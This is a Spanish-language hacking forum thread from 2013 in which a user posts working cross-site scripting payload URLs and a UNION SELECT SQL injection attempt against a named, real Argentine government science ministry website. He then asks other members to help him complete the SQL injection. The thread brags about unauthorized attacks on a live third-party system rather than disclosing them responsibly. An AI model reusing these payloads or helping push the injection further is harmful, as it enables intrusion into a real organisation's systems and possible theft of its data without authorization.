Imprimir Página - XSS y SQLI www.mincyt.gov.ar

Título: XSS y SQLI www.mincyt.gov.ar
Publicado por: Muppet en Enero 28, 2013, 09:39:34 PM

(http://i46.tinypic.com/34qpyk9.png)

http://www.mincyt.gov.ar/resultados_busqueda.php?cx=012663929835059603360%3A4cqifzdkrgc&cof=FORID%3A10&ie=UTF-8&q=<%2Fdiv><script>alert("HD_Breaker - URS")<%2Fscript><!--

Buscando un sqli encontre otro xss:

http://www.mincyt.gov.ar/busqueda/index.php?Id_modulo=3+union+select+1,2,3,4&Id_idioma=1&Id_tag=136&nombreTag=%3Cscript%3Ealert(%22HD_Breaker%20-%20URS%22)%3C/script%3E

Título: Re:XSS www.mincyt.gov.ar
Publicado por: Muppet en Enero 28, 2013, 10:09:33 PM

Che no puedo lograr la sqli pero estoy seguro q es vulnerable, si me echan una mano la sacamos entre todos

Título: Re:XSS www.mincyt.gov.ar
Publicado por: Muppet en Enero 28, 2013, 10:25:59 PM

(http://i48.tinypic.com/25qxlaq.jpg)

http://www.mincyt.gov.ar/agenda/index.php?fecha='2012-03-28

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Muppet en Enero 28, 2013, 09:39:34 PM